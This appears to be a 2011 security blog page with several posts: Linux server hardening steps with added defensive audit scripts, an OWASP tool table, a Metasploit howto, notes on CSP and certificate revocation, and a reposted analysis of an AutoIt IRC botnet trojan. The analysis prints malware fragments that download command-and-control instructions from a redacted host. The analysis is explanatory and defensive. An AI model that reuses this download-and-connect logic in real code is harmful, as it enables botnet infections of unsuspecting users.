Mar 25, 2011

Howto: Upgrade Firefox 3.6.15 to Firefox 4 in BackTrack 4

1. download Firefox 4 from [ OR URL:]
     $ wget
2. extract it
     $ tar xvf firefox-4.0.tar.bz2
3. delete your old Firefox 3.6.15 (the extracted tree replaces it in the next step)
     $ rm -rf /opt/firefox/
4. move the extracted directory to /opt
     $ mv firefox /opt/
5. run it and check the version (Help > About Firefox)
     $ firefox
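The same upgrade as an added shell example (it is not part of the original howto): it verifies the tarball's SHA-256 before touching anything and keeps the old tree as a rollback copy instead of deleting it first. The expected checksum is assumed to come from the SHA256SUMS file Mozilla publishes next to each release; GNU tar and sha256sum are assumed to be present, and the values in the usage comment are placeholders.

```sh
#!/bin/sh
# Added example, not from the original howto: install a Firefox release
# tarball only after its SHA-256 matches, and keep the previous install as
# firefox.old for rollback instead of "rm -rf"-ing it before the new one
# is in place. Assumes GNU tar and sha256sum.

# verify_tarball <tarball> <expected-sha256>: exit 0 only on a match.
verify_tarball() {
    actual=$(sha256sum "$1" | awk '{ print $1 }')
    [ "$actual" = "$2" ]
}

# install_firefox <tarball> <expected-sha256> [prefix]
# Unpacks into a staging directory under the prefix, then renames:
# prefix/firefox -> prefix/firefox.old, staging/firefox -> prefix/firefox.
install_firefox() {
    tarball=$1; expected=$2; prefix=${3:-/opt}
    if ! verify_tarball "$tarball" "$expected"; then
        echo "checksum mismatch for $tarball, refusing to install" >&2
        return 1
    fi
    staging=$(mktemp -d "$prefix/firefox.new.XXXXXX")
    # GNU tar picks the decompressor (bzip2, gzip) from the file itself
    if ! tar xf "$tarball" -C "$staging"; then
        rm -rf "$staging"
        return 1
    fi
    if [ ! -x "$staging/firefox/firefox" ]; then
        echo "archive does not contain firefox/firefox" >&2
        rm -rf "$staging"
        return 1
    fi
    rm -rf "$prefix/firefox.old"
    if [ -d "$prefix/firefox" ]; then
        mv "$prefix/firefox" "$prefix/firefox.old"
    fi
    mv "$staging/firefox" "$prefix/firefox"
    rmdir "$staging"
    "$prefix/firefox/firefox" --version      # prints the newly installed version
}

# Typical call (checksum and path are placeholders, not real values):
#   install_firefox firefox-4.0.tar.bz2 <sha256 from SHA256SUMS> /opt
```

If the new build misbehaves, moving /opt/firefox.old back into place is the whole rollback.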

How to Secure Linux Servers

Basic Linux Server Security

Install a firewall (APF or CSF firewall with BFD)
ModSecurity (web application firewall)
mod_evasive (slow down DoS attacks)
Harden the SSH server
Fix open DNS recursion
Install rkhunter
Install ClamAV (antivirus)
xinetd service hardening (disable telnet, finger and other unwanted services)
Securing PHP
PortSentry (tool to detect port scans)
Harden host.conf (against spoofing)
Check user-uploaded files
Secure /tmp folders (noexec, nosuid)

This guide covers only basic Linux server security tips and is intended for Linux learners. It assumes you are running CentOS 5 or a later version.

Install Firewall

The very first step in securing a server is installing a firewall (at least an iptables-based one) to close every port you do not use. Once the firewall is in place, a good half of the basic hardening is done. You can install the CSF or APF firewall; APF is usually paired with BFD (brute force detection), and CSF ships its own login failure daemon, lfd.
We will install CSF (ConfigServer Security & Firewall), as it is easy to install, has plenty of features and integrates with cPanel if you run it.
tar zxf csf.tar.gz
sh /csf/
Follow the installer. Before starting the firewall, open csf.conf and make sure the ports you need (above all your SSH port) are in the allowed TCP list, or you will lock yourself out. Once you are happy with the rules, set TESTING to 0: in testing mode a cron job flushes the rules every few minutes, so the firewall is not really protecting you. Then you can start the firewall.
csf -s
// start the firewall
csf -r
// restart the firewall
csf -f
// flush the rules (stops the firewall)
You can see the full installation tutorial here

Harden SSH server

Very often you will see SSH attacks from bots that try to get into your server by connecting to port 22 and making an unlimited number of login attempts. Attacks arriving from many different IPs can also put a real load on your server. You can trace those failed attempts in your log files
cat /var/log/secure
cat /var/log/messages
To harden your SSH server,
  • Run SSH on a port other than the default 22 (this cuts the log noise from bots; it is not a substitute for the points below)
  • Disable root login and use sudo from an unprivileged account instead
  • Use only protocol 2
  • Enable public key authentication and, once your keys are deployed, disable password authentication
You can see the full SSH hardening tutorial here
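Two checks that go with the section above, as an added example rather than part of the original guide: a summary of the failed logins the text tells you to look for in /var/log/secure, and an audit of sshd_config for the four hardening points. The log lines and the config are constructed samples (the hostname and addresses are made up, from the RFC 5737 documentation ranges); on a real host point the functions at /var/log/secure and /etc/ssh/sshd_config.

```sh
#!/bin/sh
# Added example, not from the original guide. Summarises "Failed password"
# lines per source address and audits sshd_config. Sample data below is
# constructed, in the format CentOS sshd logs through syslog.

# failed_ssh_by_ip < secure-log: "count ip" per source address, busiest first.
failed_ssh_by_ip() {
    awk '/sshd\[[0-9]+\]: Failed password/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { print $(i + 1); break }
        }' | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# sshd_setting <sshd_config> <keyword>: the effective value. sshd takes the
# first uncommented occurrence of a keyword and ignores later duplicates.
sshd_setting() {
    awk -v key="$2" '$1 !~ /^#/ && tolower($1) == tolower(key) { print $2; exit }' "$1"
}

# sshd_audit <sshd_config>: one line per finding; silent when everything is set.
# Values are required to be set explicitly, so no assumption about the
# compiled-in defaults of a particular OpenSSH version is made.
sshd_audit() {
    cfg=$1
    v=$(sshd_setting "$cfg" Port)
    [ -n "$v" ] && [ "$v" != "22" ] || echo "Port ${v:-22}: bots hammer the default (moving it cuts noise, it is not a control)"
    v=$(sshd_setting "$cfg" PermitRootLogin)
    [ "$v" = "no" ] || echo "PermitRootLogin ${v:-unset}: set it to no and use sudo"
    v=$(sshd_setting "$cfg" Protocol)
    [ "$v" = "2" ] || echo "Protocol ${v:-unset}: set it explicitly to 2"
    v=$(sshd_setting "$cfg" PubkeyAuthentication)
    [ "$v" = "yes" ] || echo "PubkeyAuthentication ${v:-unset}: set it to yes"
    v=$(sshd_setting "$cfg" PasswordAuthentication)
    [ "$v" = "no" ] || echo "PasswordAuthentication ${v:-unset}: set it to no once keys are deployed"
}

# Constructed /var/log/secure excerpt (not a real capture).
sample_secure_log() {
    cat <<'EOF'
Mar 25 03:14:07 web1 sshd[1234]: Failed password for root from 203.0.113.5 port 51234 ssh2
Mar 25 03:14:09 web1 sshd[1236]: Failed password for invalid user admin from 203.0.113.5 port 51240 ssh2
Mar 25 03:15:01 web1 sshd[1300]: Accepted publickey for deploy from 198.51.100.7 port 40000 ssh2
Mar 25 03:16:22 web1 sshd[1350]: Failed password for invalid user test from 198.51.100.9 port 40010 ssh2
EOF
}

# Constructed sshd_config with two of the four points still wrong.
sample_sshd_config() {
    cat <<'EOF'
# constructed sshd_config sample
Port 22
#PermitRootLogin no
PermitRootLogin yes
Protocol 2
PubkeyAuthentication yes
PermitRootLogin no
EOF
}

# Usage on a live system:
#   failed_ssh_by_ip < /var/log/secure | head
#   sshd_audit /etc/ssh/sshd_config
```

Note that the second PermitRootLogin line in the sample is ignored by sshd: only the first uncommented value counts, which is a common reason a "fixed" sshd_config still allows root logins.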

Disable Telnet & Other Unused Services

You may want to disable services like telnet, finger and anything else you do not need that runs under xinetd.
nano /etc/xinetd.d/telnet
// OR
nano /etc/xinetd.d/krb5-telnet
look for the line disable = no and change it to disable = yes, then restart xinetd. chkconfig can make the same change for you:
chkconfig telnet off
Better still, remove the telnet-server package altogether; a service that is not installed cannot be switched back on by mistake.
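An added example serving both the firewall section ("close all unused ports") and the xinetd section above; it is not from the original guide. The first function lists sockets reachable from outside that are not on your allow list, the second lists xinetd services that are still enabled. Both work on text you feed them, so they run here on a constructed sample; on a real host pipe in the output of ss -lntu (column 5 is the local address; skip the header line) and point the second function at /etc/xinetd.d.

```sh
#!/bin/sh
# Added example, not from the original guide: audit what is listening and
# which xinetd services are still on. Input format is that of "ss -lntu"
# (Netid State Recv-Q Send-Q Local-Address:Port Peer-Address:Port).

# unexpected_listeners "<allowed ports>" < ss-output
# Prints "proto port address" for every socket bound to something other than
# loopback whose port is not in the allowed list.
unexpected_listeners() {
    awk -v allowed="$1" '
        BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        {
            proto = $1; laddr = $5
            i = match(laddr, /:[0-9*]+$/)            # port follows the last colon
            if (i == 0) next
            addr = substr(laddr, 1, i - 1); port = substr(laddr, i + 1)
            if (addr == "127.0.0.1" || addr == "::1" || addr == "[::1]") next
            if (!(port in ok)) print proto, port, addr
        }'
}

# enabled_xinetd_services <dir>: name of every service file in the directory
# that does not contain "disable = yes".
enabled_xinetd_services() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        if ! grep -Eq '^[[:space:]]*disable[[:space:]]*=[[:space:]]*yes' "$f"; then
            basename "$f"
        fi
    done
}

# Constructed "ss -lntu" output (not captured from a real host).
sample_ss_output() {
    cat <<'EOF'
tcp   LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:80          0.0.0.0:*
tcp   LISTEN 0      100    127.0.0.1:25        0.0.0.0:*
tcp   LISTEN 0      80     0.0.0.0:3306        0.0.0.0:*
udp   UNCONN 0      0      0.0.0.0:111         0.0.0.0:*
EOF
}

# Usage:
#   sample_ss_output | unexpected_listeners "22 80 443"
#   -> tcp 3306 0.0.0.0
#      udp 111 0.0.0.0
#   ss -lntu | tail -n +2 | unexpected_listeners "22 80 443"
#   enabled_xinetd_services /etc/xinetd.d
```

Anything the first function prints is either a service that should be bound to 127.0.0.1 only (MySQL in the sample), a port to add to the firewall's allow list, or a daemon to switch off.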

Hardening PHP for Security

PHP is the most popular scripting language for Apache and MySQL. You will need to disable the system-level functions in the PHP configuration file.
nano /usr/local/lib/php.ini
(that is the cPanel location; on a stock CentOS install the file is /etc/php.ini, and php --ini prints the path actually in use.) Look for the following lines and make sure they read as below.
disable_functions = exec,system,shell_exec,passthru
register_globals = Off
expose_php = Off
Extend disable_functions with the other process-spawning functions your application does not use (popen, proc_open and friends). Do not rely on magic_quotes_gpc: it escapes input inconsistently, was deprecated in PHP 5.3 and removed in PHP 5.4, and is not a defence against SQL injection. Use prepared statements (parameterised queries) in the application instead.
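An added example for the PHP section (not part of the original guide): read the effective values out of a php.ini and report which dangerous functions the disable_functions list still leaves callable, plus a few settings that should be off. The php.ini fragment below is constructed; the watch list of functions is an assumption to extend for your own application.

```sh
#!/bin/sh
# Added example, not from the original guide: audit php.ini.
# Point the functions at the real file ("php --ini" prints its path).

# php_ini_value <php.ini> <directive>: value of the first uncommented
# "directive = value" line, quotes and trailing comments stripped.
php_ini_value() {
    awk -v key="$2" '
        /^[[:space:]]*;/ { next }                  # ; starts a comment line
        {
            line = $0
            sub(/;.*$/, "", line)                  # drop a trailing comment
            n = index(line, "=")
            if (n == 0) next
            k = substr(line, 1, n - 1)
            v = substr(line, n + 1)
            gsub(/^[[:space:]]+|[[:space:]]+$/, "", k)
            gsub(/^[[:space:]]+|[[:space:]]+$/, "", v)
            gsub(/^"|"$/, "", v)
            if (k == key) { print v; exit }
        }' "$1"
}

# missing_disabled_functions <php.ini>: names from the watch list that are
# absent from disable_functions, one per line.
missing_disabled_functions() {
    have=$(php_ini_value "$1" disable_functions | tr -d ' ')
    # Assumed watch list: process spawning and code loading functions.
    for fn in exec system shell_exec passthru popen proc_open pcntl_exec dl; do
        case ",$have," in
            *",$fn,"*) ;;
            *) echo "$fn" ;;
        esac
    done
}

# php_hardening_report <php.ini>: one line per finding.
php_hardening_report() {
    ini=$1
    for setting in expose_php:off register_globals:off allow_url_include:off display_errors:off; do
        key=${setting%%:*}; want=${setting#*:}
        got=$(php_ini_value "$ini" "$key" | tr 'A-Z' 'a-z')
        [ "$got" = "$want" ] || echo "$key is '${got:-unset}', want $want"
    done
    missing_disabled_functions "$ini" | sed 's/^/disable_functions is missing: /'
}

# Constructed php.ini fragment (the settings the original text shows, plus
# one that is wrong and one that is absent).
sample_php_ini() {
    cat <<'EOF'
; constructed php.ini fragment
disable_functions = exec,system,shell_exec,passthru
register_globals = Off
expose_php = Off
magic_quotes_gpc = On   ; removed in PHP 5.4, not an SQL injection defence
display_errors = On
EOF
}

# Usage:
#   php_hardening_report /etc/php.ini
```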

Disable Open DNS Recursion (DNS Server)

If you are running the BIND DNS server, you do not want to allow recursive lookups from anyone other than your local IPs: an open resolver can be abused for cache poisoning and reflection attacks, and it slows down your server.
nano /etc/named.conf
Under options { place a line
options {
recursion no;
This turns recursion off for everyone, including localhost. If local clients resolve through this server, keep recursion on but restrict it to your own networks with an allow-recursion list instead. Then restart BIND
service named restart
You will also need to restrict zone transfers (allow-transfer) and notifications if you are running BIND 9. Refer to: dns server hardening
Afterwards, test from an outside host that a lookup for a name you are not authoritative for is refused.
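The outside test, as an added example (not from the original guide). Query the server from another host for a name it is not authoritative for: an open resolver answers and sets the "ra" (recursion available) flag, a hardened one returns REFUSED or a bare referral without "ra". The two responses below are constructed dig headers rather than real captures; on a real host pipe in the output of dig @your-nameserver example.org A.

```sh
#!/bin/sh
# Added example, not from the original guide: decide from dig output whether
# a name server still offers recursion to the querying host.

# dig_flags < dig-output: the flag words from the ";; flags:" line.
dig_flags() {
    sed -n 's/^;; flags: \([^;]*\);.*/\1/p'
}

# dig_status < dig-output: the status word from the ";; ->>HEADER<<-" line.
dig_status() {
    sed -n 's/.*status: \([A-Z]*\),.*/\1/p'
}

# is_open_resolver < dig-output: exit 0 when the server answered (not
# REFUSED) and advertised recursion with the "ra" flag.
is_open_resolver() {
    out=$(cat)
    flags=$(printf '%s\n' "$out" | dig_flags)
    status=$(printf '%s\n' "$out" | dig_status)
    [ "$status" = "REFUSED" ] && return 1
    case " $flags " in
        *" ra "*) return 0 ;;
    esac
    return 1
}

# Constructed dig headers (not real captures).
sample_open_answer() {
    cat <<'EOF'
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4242
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
EOF
}

sample_refused_answer() {
    cat <<'EOF'
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 4243
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
EOF
}

# Usage from an outside host:
#   dig @ns1.example.net example.org A | is_open_resolver && echo "still open"
```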

Install Mod_Security

ModSecurity is a free, open-source web application firewall that can help guard against LFI (local file inclusion) and SQL injection attacks.
CPanel Installation:
Just go to cPanel WHM > Plugins > Enable Mod_Security > Save. That installs mod_security into cPanel's Apache; it should then show up among the loaded modules if you run a test.php containing phpinfo(). Try adding some mod_security rules.
Source Installation:
Installing mod_security from source can be fiddly. Do not use apxs to compile it, as that causes a number of problems.
Note: mod_security needs the libxml2 and httpd-devel libraries before it can be built. It also requires mod_unique_id to be enabled in Apache. To enable mod_unique_id, place
LoadModule unique_id_module modules/
in your httpd.conf file.
yum install libxml2 libxml2-devel httpd-devel
Download the latest version of mod_security for Apache 2 from
tar zxf modsecurity-apache_2.5.4.tar.gz
cd modsecurity-apache_2.5.4
cd apache2
(2.5.4 is the release the original used; take the current release.) If you cannot find ./configure, edit the Makefile and set top_dir = /usr/lib/httpd (for CentOS)
make install
Next, copy the rule files you want (the source also ships a minimal rule set). Make a directory named modsecurity under /etc/httpd/conf, copy the mod_security rules there and finally include them from httpd.conf
# /etc/httpd/conf/httpd.conf
LoadModule unique_id_module modules/
LoadFile /usr/lib/
LoadModule security2_module modules/
Include conf/modsecurity/*.conf
/etc/init.d/httpd restart
Log Files
Watch the audit and error logs both for configuration errors and for blocked requests. Run a new rule set in detection-only mode for a while before letting it block, so you catch false positives on your own application first.

If you get any errors, I have compiled a list of errors seen while compiling; see here

Install Mod_Evasive

The mod_evasive module for Apache offers some protection against DoS (denial of service) attacks on your server by temporarily blocking clients that request pages too quickly.
tar zxf mod_evasive_1.10.1.tar.gz
cd mod_evasive
then run the following command for Apache 2, which compiles, installs and activates the module in your server:
> /usr/sbin/apxs -cia mod_evasive20.c
Once mod_evasive is installed, place the following lines in your /etc/httpd/conf/httpd.conf and restart Apache
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 10
</IfModule>
With these values a client that asks for the same page more than twice within one second, or makes more than 50 requests to the site within one second, gets a 403 for the next ten seconds. Check the thresholds against your own traffic (a page with many images can trip them on its own), whitelist your monitoring hosts with DOSWhitelist, and follow the instructions in the README for further tuning. Bear in mind that mod_evasive only helps against an abusive client or two; a distributed flood that fills your bandwidth has to be stopped upstream.

Install RkHunter (Rootkit)

rkhunter is a rootkit scanner: it checks the system for known rootkits, backdoors, suspicious files and altered binaries and reports what it finds so that you can harden the server further. Installing it is very easy!
yum install rkhunter
To run the checks on your system (the two forms are the same command)
rkhunter --checkall
rkhunter -c
Run it once right after installation to record a clean baseline, and after every legitimate package update refresh the stored file properties (rkhunter --propupd); otherwise the next run reports the updated binaries as changed.
You can find out what command options are available under rkhunter by issuing this help command
> rkhunter --help

Install PortSentry

PortSentry is a tool that detects port scans, logs them and can block the scanning host. Download the source package of portsentry from
wget http://path/to/portsentry-1.2.tar.gz
tar zxf portsentry-1.2.tar.gz
make linux
make install
If you get errors like the following while compiling
make linux
gcc -O -Wall -DLINUX -DSUPPORT_STEALTH -o ./portsentry ./portsentry.c \
./portsentry_io.c ./portsentry_util.c
./portsentry.c: In function 'PortSentryModeTCP':
./portsentry.c:1187: warning: pointer targets in passing argument 3 of 'accept' differ in signedness
./portsentry.c: In function 'PortSentryModeUDP':
./portsentry.c:1384: warning: pointer targets in passing argument 6 of 'recvfrom' differ in signedness
./portsentry.c: In function 'Usage':
./portsentry.c:1584: error: missing terminating " character
./portsentry.c:1585: error: 'sourceforget' undeclared (first use in this function)
./portsentry.c:1585: error: (Each undeclared identifier is reported only once
./portsentry.c:1585: error: for each function it appears in.)
./portsentry.c:1585: error: expected ')' before 'dot'
./portsentry.c:1585: error: stray '\' in program
./portsentry.c:1585: error: missing terminating " character
./portsentry.c:1595: error: expected ';' before '}' token
make: *** [linux] Error 1
To fix:
Open portsentry.c and look for the following line. An extra carriage return breaks the string literal across two lines; delete it so that the statement is on a single line again, as below.
printf ("Copyright 1997-2003 Craig H. Rowland <craigrowland at users dot sourceforget dot net>\n");
Then run make linux and make install again. That should fix it!
To launch portsentry (stealth TCP and UDP modes)
/usr/local/psionic/portsentry/portsentry -stcp
/usr/local/psionic/portsentry/portsentry -sudp
Check the logs (/var/log/secure or /var/log/messages, depending on your syslog configuration) to confirm that portsentry is active and to see what it has blocked. Because PortSentry blocks whatever address it sees scanning, an attacker can send scan packets with a forged source address to get you to block hosts you depend on (your DNS servers, gateway, monitoring hosts); list those in portsentry.ignore before enabling blocking.

Prevent IP Spoofing

The nospoof option in host.conf is meant to defend against DNS-based spoofing: when a hostname is obtained by reverse lookup, the resolver checks that the name resolves back to the same address and rejects the result if it does not. It does nothing against forged source addresses on the wire; for that, enable the kernel's reverse-path filter (the rp_filter sysctl) and drop obviously bogus source addresses at the firewall. Edit host.conf and add the following lines. The order line gives BIND preference over /etc/hosts (the usual default is the reverse; on current glibc the lookup order actually comes from /etc/nsswitch.conf).
order bind,hosts
nospoof on

Install ClamAV

Antivirus protection is the last item on the list: it protects against worms and trojans arriving in your mailboxes and files. Just install ClamAV (a free, open-source antivirus engine for Linux; on CentOS the package comes from the EPEL repository). More information can be found on the ClamAV website
yum install clamav
Once you have installed ClamAV on your CentOS box, here are some of the basic commands.
1. To update the virus database
> freshclam
2. To run a scan
clamscan -r /home
3. Running as a daily cron job
To scan automatically every day, add the following line to /etc/crontab (its lines carry a user field; if you use crontab -e instead, leave the root field out).
02 1 * * * root clamscan -r /var/www
This runs the job daily at 1:02 AM and scans the public html. You can change the folder to whatever you want, mail spools for instance. cl amscan exits with status 1 when it finds something, so have the job write its report to a log (the --log option) or mail it to you, and keep freshclam running regularly too: a scanner with a stale database misses current malware.
That's it! Always keep an eye on the log files for any attacks or error messages!


OWASP Top 10 Tools and Tactics

Following is a risk and tool matrix (OWASP Top 10, 2010 edition).
RISK                                              TOOL
A1: Injection                                     SQL Inject Me
A2: Cross-Site Scripting (XSS)                    ZAP
A3: Broken Authentication and Session Management  HackBar
A4: Insecure Direct Object References             Burp
A5: Cross-Site Request Forgery (CSRF)             Tamper Data
A6: Security Misconfiguration                     Watobo
A7: Insecure Cryptographic Storage                N/A
A8: Failure to Restrict URL Access                Nikto/Wikto
A9: Insufficient Transport Layer Protection       Calomel
A10: Unvalidated Redirects and Forwards           Watcher

If you want to read detail, please go to the Source

Creating a Simple Botnet Using the AutoIT Scripting Language

AutoIt, a free automation language for the Windows platform, is often used for scripting Windows applications and sometimes misused for creating malware. AutoIt scripts can be compiled into a compressed, standalone executable that runs without an interpreter; Aut2Exe is the application that compiles an AutoIt script into such an executable.

MessageLabs Intelligence recently discovered an AutoIt trojan using IRC (online chat) to connect an infected machine to a command and control channel without the user's knowledge. The malware is sent as an enticing message containing an archive of .GIF files, with a subject like "My Photos", to around 50 recipients to lure them into opening the attachment.
[Figure 1 - Example Email]
One of the files, disguised as a .GIF image, is actually an executable that uses an image icon, which may give the illusion that the executable is a broken image (as seen in figure 2, below). If the user tries to open the file, it executes and gives the appearance that something has not worked correctly, as no image is displayed; the user may conclude that it is nothing more than a corrupt image.

[Figure 2 - Content of Attached Archive File]

Once the executable is triggered, it connects to a website based in Vietnam (.vn) and downloads instructions to connect to an IRC server for its command and control. These are saved as a plain text file and used to join the correct channel.

[Figure 3 - Text File Being Downloaded, Identifying Command and Control Channel]
Once connected, further instructions may be downloaded as the infected machines are now joined to a small botnet, or robot network. A botnet may be used to conduct Distributed Denial of Service (DDoS) attacks, sending spam, hosting websites, targeting other computers by exploiting existing vulnerabilities and pushing adware or spyware on to infected machines.

Below are some fragments of the script code used:
; InetGet(url, local file, 1 = force a fresh download, 0 = wait for completion)
INETGET ( "http://[removed].vn/[removed].php" , @SYSTEMDIR & "\[removed].txt" , 1 , 0 )
This call downloads the IRC details, which are parsed later to extract the IRC server name, the port to connect to, the channel name and the version of the malware (presumably used to provide an update facility).

Once it has collected all this information, it then tries to identify the infected machine’s external IP address by contacting another website for this purpose.
; same call, this time against an external "what is my IP" page
INETGET ( "http://[removed].com/" , @SYSTEMDIR & "\ip.txt" , 1 , 0 )
The above command fetches the machine's external IP address and stores it in the file ip.txt.
It then creates a nickname for the computer to connect to the channel, a fixed tag followed by randomly generated letters:
; Random(65, 90, 1) returns an integer from 65 to 90, the ASCII codes of A..Z,
; so the nickname is the tag followed by eight random capital letters
$NICK = "[REMOVED]-" & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & 
        CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) &
        CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) )
After this it then connects to the IRC channel in the background to join the botnet.

 You can read full article at the Source.
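A defender's check for the trick the article describes, an executable posing as a .GIF, added here as an example (it is not from the article). File extensions and icons are attacker-controlled, so the check looks at the content instead: a Windows executable starts with the bytes "MZ" whatever it is called. The sample files are constructed in a temporary directory; no real malware is involved.

```sh
#!/bin/sh
# Added example, not from the article: find files in an extracted attachment
# that claim to be images but carry an executable header, or that hide a
# second extension behind an image-looking name (photo.gif.exe).

# file_magic <file>: first four bytes as printable text ("MZ..", "GIF8", ...).
file_magic() {
    LC_ALL=C head -c 4 "$1" | LC_ALL=C tr -c '[:print:]' '.'
}

# find_disguised_executables <dir>: one line per suspicious file.
find_disguised_executables() {
    find "$1" -type f | while IFS= read -r f; do
        name=$(basename "$f" | tr 'A-Z' 'a-z')
        case "$name" in
            *.gif.exe|*.jpg.exe|*.jpeg.exe|*.png.exe|*.gif.scr|*.jpg.scr|*.png.scr)
                echo "double extension: $f" ;;
            *.gif|*.jpg|*.jpeg|*.png|*.bmp)
                case "$(file_magic "$f")" in
                    MZ*) echo "MZ header in image file: $f" ;;
                esac ;;
        esac
    done
}

# make_sample_files <dir>: constructed test files, one real GIF header, one
# PNG header, and two files with a PE-style "MZ" header (harmless stubs).
make_sample_files() {
    printf 'GIF89a' > "$1/holiday1.gif"
    printf 'MZ\220\000\003\000' > "$1/holiday2.gif"      # executable header, image name
    printf 'MZ\220\000\003\000' > "$1/holiday3.gif.exe"  # double extension
    printf '\211PNG\r\n' > "$1/holiday4.png"
}

# Usage:
#   d=$(mktemp -d); make_sample_files "$d"; find_disguised_executables "$d"
#   -> double extension: .../holiday3.gif.exe
#      MZ header in image file: .../holiday2.gif
```

On a mail gateway the same check belongs in the attachment filter, where it catches the "image" before a user ever double-clicks it.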

Mar 24, 2011

Twitter tests XSS attack prevention on its mobile website

Twitter has been testing, and has now deployed, Content Security Policy (CSP), a new standard developed by Mozilla to block cross-site scripting (XSS) attacks, on its mobile website.

"When a website enables CSP, the browser ignores inline Javascript and only loads external assets from a set of whitelisted sites. Enabling CSP on our site was simply a matter of including the policy in the returned headers under the CSP defined key, 'X-Content-Security-Policy'."

"The policy also contains a 'reporting URI' to which the browser sends JSON reports of any violations. The testing executed in the last few weeks revealed situations that triggered a report without being actual malicious attempts. For example, it turns out that a number of popular Firefox extensions insert Javascript on page load and that various ISPs insert Javascript or change image tags so that they point to their caching servers. Twitter resolved this triggering problem by mandating SSL for Firefox 4 users."

 You can read full article at the Source.
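An added example for the CSP post above (not from the article): pull the script policy out of a CSP header the way a browser does, script-src with a fallback to default-src, and tell whether inline scripts, the usual XSS payload, are still allowed, and where violation reports go. The policies are made-up samples. The standard header name is Content-Security-Policy (with Content-Security-Policy-Report-Only for the report-but-do-not-block testing phase the article describes); X-Content-Security-Policy was the Mozilla-prefixed form Firefox 4 understood at the time.

```sh
#!/bin/sh
# Added example, not from the article: parse a CSP policy string.

# csp_directive "<policy>" <name>: the directive's source list, or nothing.
csp_directive() {
    printf '%s' "$1" | tr ';' '\n' | awk -v want="$2" '
        { sub(/^[[:space:]]+/, "") }
        $1 == want { $1 = ""; sub(/^[[:space:]]+/, ""); print; exit }'
}

# csp_script_sources "<policy>": what governs <script>; script-src if
# present, otherwise default-src (the CSP fallback rule).
csp_script_sources() {
    srcs=$(csp_directive "$1" script-src)
    [ -n "$srcs" ] || srcs=$(csp_directive "$1" default-src)
    printf '%s\n' "$srcs"
}

# csp_allows_inline_script "<policy>": exit 0 if 'unsafe-inline' applies to
# scripts, i.e. a reflected <script> payload would still run.
csp_allows_inline_script() {
    case " $(csp_script_sources "$1") " in
        *" 'unsafe-inline' "*) return 0 ;;
    esac
    return 1
}

# Made-up sample policies.
STRICT_POLICY="default-src 'self'; script-src 'self' https://cdn.example.net; report-uri /csp/report"
LAX_POLICY="default-src 'self' 'unsafe-inline'; img-src *"

# Usage:
#   csp_script_sources "$STRICT_POLICY"       -> 'self' https://cdn.example.net
#   csp_allows_inline_script "$LAX_POLICY"    -> exit 0 (inline scripts run)
#   csp_directive "$STRICT_POLICY" report-uri -> /csp/report
```

The second policy looks restrictive (everything limited to 'self') but the 'unsafe-inline' in default-src flows down to script-src, which is exactly the case the fallback logic has to catch.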

Mar 21, 2011

Five security secrets your IT administrators don't want you to know

Here are five facts about IT security that your administrators probably don't want you to know.

Most passwords never change

Sensitive accounts like administrator logins, embedded application-to-application passwords, and privileged service accounts often keep the same passwords for years because IT staff may not have the tools to track and change them. And, because systems and applications often crash when IT personnel attempt to change interdependent credentials, many of your organization’s most privileged logins can go unchanged for extended periods of time.

Ad-hoc change processes and handwritten scripts might succeed in updating the passwords of some types of privileged accounts, but unless your organization has invested in privileged identity management software you can be sure that many of the passwords that grant access to your organization’s most sensitive information are never changed. This means that access to this data – whether by IT staff, programmers, subcontractors and others who ever had access – will continue to spread over time.

Too many individuals have too much access

As a result, contractors, service providers, application programmers and even end users are likely to have the ability to gain privileged access using credentials that may never change. Unless you have technology in place to track privileged logins, delegate access and change these powerful credentials after each time they are used, you will never know who now has access.

Your CEO's data isn't private

Anyone with knowledge of the right credentials can gain anonymous access to read, copy and alter data – including the communications and application data belonging to your executive staff.

IT auditors can be misled

IT staff have limited time to complete higher-visibility projects that influence performance ratings and paychecks, so in most cases you can forget about them fixing any security holes that your auditors fail to notice.

Security often takes a back seat

Is your IT administrators’ pay structure tied to security? No? Then they’re probably not as proactive as you might expect when it comes to securing your network. Most IT administrators won’t tell you about the security vulnerabilities they discover in the course of their jobs because they’re not paid to fight losing battles to gain resources necessary to close each discovered security gap.

Because pay packages are rarely tied to safeguarding your network, your IT administrator is also probably not taking the initiative to update her technical skills when it comes to security. As a result, even when budgets allow for purchases of new security technologies, your staff may have no clue how to actually use these new tools effectively.


About my blog and my posts in this blog.

Someone misunderstood that all the posts in this blog were written by me.

Some posts I wrote myself, and some I copied from other websites or blogs. If a post is from another website, I post it with "Source: The Original Post" to tell you where I got it. I want to tell the writers of all the articles I bring here that I really do not intend to pass their articles off as my own. Next time I will make the "Source:" note and the quote clearer, so it is easy to see which articles are mine and which are not.

Sorry again to all the writers who misunderstood me.

Howto: Add Unstable Modules into Metasploit

After I read "" from Tweet-HDMoore, I tried it myself, downloading into my Metasploit path like this.

1. cd /pentest/exploits/framework3
2. svn co /pentest/exploits/framework3/modules/unstable/
3. msfconsole

Mar 20, 2011

HTTPS and Revocation

When an HTTPS certificate is issued, it's typically valid for a year or two. But what if something bad happens? What if the site loses control of its key?
In that case you would really need a way to invalidate a certificate before it expires and that's what revocation does. Certificates contain instructions for how to find out whether they are revoked and clients should check this before accepting a certificate.
There are basically two methods for checking if a certificate is revoked: certificate revocation lists (CRLs) and OCSP. CRLs are long lists of serial numbers that have been revoked while OCSP only deals with a single certificate. But the details are unimportant, they are both methods of getting signed and timestamped statements about the status of a certificate.
